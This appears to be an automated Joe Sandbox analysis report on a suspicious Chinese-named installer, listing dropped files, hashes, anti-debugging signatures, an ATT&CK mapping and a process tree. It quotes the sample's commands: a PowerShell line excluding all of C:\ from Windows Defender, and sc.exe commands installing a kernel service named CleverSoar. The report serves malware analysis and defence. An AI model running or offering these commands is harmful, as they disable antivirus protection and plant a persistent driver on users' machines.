Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 579
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 564
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-TAP4G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE3AEC0 FindFirstFileA,FindClose,FindClose, 6_2_6CE3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00466868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00466868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00467496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00467496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00469C60 GetSystemInfo, 10_2_00469C60
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000002.2135843718.000000000158D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6CCC3886
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CE50181
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_004E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004E57D0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE59D66 mov eax, dword ptr fs:[00000030h] 6_2_6CE59D66
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE59D35 mov eax, dword ptr fs:[00000030h] 6_2_6CE59D35
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE4F17D mov eax, dword ptr fs:[00000030h] 6_2_6CE4F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE48CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CE48CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CF17720 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0046AB2A GetSystemTimeAsFileTime
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00500090 GetVersion
MITRE ATT&CK Matrix (one line per tactic; a bracketed number is the count badge the report shows beside that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter [2]; Service Execution [1]; Native API [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation [1]; Windows Service [1]; Process Injection [111]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [11]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [1]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Security Software Discovery [321]; Virtualization/Sandbox Evasion [231]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [2]; File and Directory Discovery [3]; System Information Discovery [25]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1579605, Sample: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 76), rendered here as a process tree recovered from the graph data:

Sample-level signatures: Found driver which could be used to inject code into processes; PE file contains section with special chars; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

- #U5b89#U88c5#U52a9#U624b_1.0.9.exe (started)
  - dropped: C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PE32)
  - #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (started)
    - dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
    - signature: Adds a directory exclusion to Windows Defender
    - #U5b89#U88c5#U52a9#U624b_1.0.9.exe (started)
      - dropped: C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PE32)
      - #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (started)
        - dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Program Files (x86)\...\trash (copy) (PE32+); 3 other files (none is malicious)
        - signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
        - 7zr.exe (started); dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+); child: conhost.exe
        - 7zr.exe (started); child: conhost.exe
    - powershell.exe (started)
      - signature: Loading BitLocker PowerShell Module
      - children: conhost.exe; WmiPrvSE.exe
- cmd.exe (started) -> sc.exe -> conhost.exe
- cmd.exe (started) -> sc.exe -> conhost.exe
- 31 other processes -> sc.exe (x3, each -> conhost.exe) and 27 other processes (-> conhost.exe and 26 other processes)
Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | 6% | Virustotal
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | 0% | ReversingLabs

Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-TAP4G.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | false | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | unknown
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | false | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | unknown
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | false | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | false | unknown
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579605
Start date and time: 2024-12-23 05:06:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_1.0.9.exe (renamed because the original name is a hash value)
Original Sample Name: _1.0.9.exe
Detection: MAL
Classification: mal76.evad.winEXE@141/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 28
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:07:00 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp modified
23:07:03 | API Interceptor | 26x Sleep call for process: powershell.exe modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | ekTL8jTI4D.msi | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
• Filename: ekTL8jTI4D.msi, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999161200123711
Encrypted: true
SSDEEP: 6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
MD5: 6B02F0DA3BB2B4FE892A9A462B66FF7C
SHA1: 5C9453562989CC675FBC88545BE306EF5CB09EF2
SHA-256: 58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
SHA-512: 3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
Malicious: false
                              Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
Process: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: false
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999161200123711
Encrypted: true
SSDEEP: 6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
MD5: 6B02F0DA3BB2B4FE892A9A462B66FF7C
SHA1: 5C9453562989CC675FBC88545BE306EF5CB09EF2
SHA-256: 58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
SHA-512: 3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
